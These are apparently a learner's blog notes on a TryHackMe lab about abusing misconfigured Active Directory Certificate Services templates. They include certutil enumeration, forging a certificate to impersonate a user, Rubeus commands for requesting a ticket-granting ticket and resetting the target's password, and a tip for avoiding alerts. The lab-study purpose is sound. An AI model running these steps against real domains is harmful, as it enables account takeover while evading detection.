TryHackMe: Jr. Penetration Tester (Supplements)

Today’s TryHackMe Jr. Penetration Tester “supplements”:

Introduction: AD Certificate Templates

This room is based on SpectreOps’ “Certified Pre-Owned” research, and will deal with misconfigured templated in the Active Directory Certificate Service (AD CS).

A Brief Look at Certificate Templates

AD CS is AD’s PKI, and is used on the back end for everything from provisioning disk encryption keys to user authentication. Certificate templates are a way to automate the certificate request process: Rather than an admin approving all CSRs manually, AD CS checks to see if a relevant “template” (which is really a template + associated settings + an access policy) exists that matches the supplied CSR and is configured to allow the requesting user to generate a certificate.

Certificate Template Enumeration

Enumerate all certificate templates from a domain-joined computer and domain-authenticated user:

certutil -v -template

This will probably generate a lot of output. Template blocks begin with Template[n]: (where n is an integer). We need a template to have three properties in order to use it for privesc or persistence:

There are actually some other requirements (like fully automated certificate provisioning), but by default these are all satisfied.

It’s often helpful in this process to display information about the current user:

net user $USERNAME /domain

Note that the special group “Domain Users” represents all users in the domain, and “Domain Computers” represents all domain-joined computers (we can request a certificate as a computer if we have admin rights on that machine).

Generating a Malicious Certificate

The vulnerable cert will be added under the “Personal” folder that was initially clicked on. Once the certificate has been generated, export it (be sure to include the associated private key!) for use in other exploitation tools.

User Impersonation Through a Certificate

Rubeus can be used to request a Kerberos ticket granting ticket using the certificate:

Rubeus.exe asktgt /user:$USER \
                  /enctype:aes256 \
                  /certificate:$CERTIFICATE_FILE \
                  /password:$CERTIFICATE_FILE_PASSWORD \
                  /outfile:$TICKET_FILE \
                  /domain:$DOMAIN \
                  /dc:$DC_IP_ADDRESS

Here we explode the UPN of the user we’re going to impersonate between the /user and /domain flags; using /enctype:aes256 will prevent some alerts from being generated. TryHackMe recommends using the same domain controller that the CA service is running on. Once we have the ticket (in $TICKET_FILE), we can feed it into our favorite tool for actual exploitation.

Change a user’s password with Rubeus:

Rubeus.exe changepw /ticket:$TICKET_FILE \
                    /new:$NEW_PASSWORD \
                    /dc:$DC_IP_ADDRESS \
                    /targetuser:$DOMAIN\$USER

Use runas to open a command prompt as another user:

runas /user:$DOMAIN\$USER cmd.exe

Nathan Acks
May 10, 2022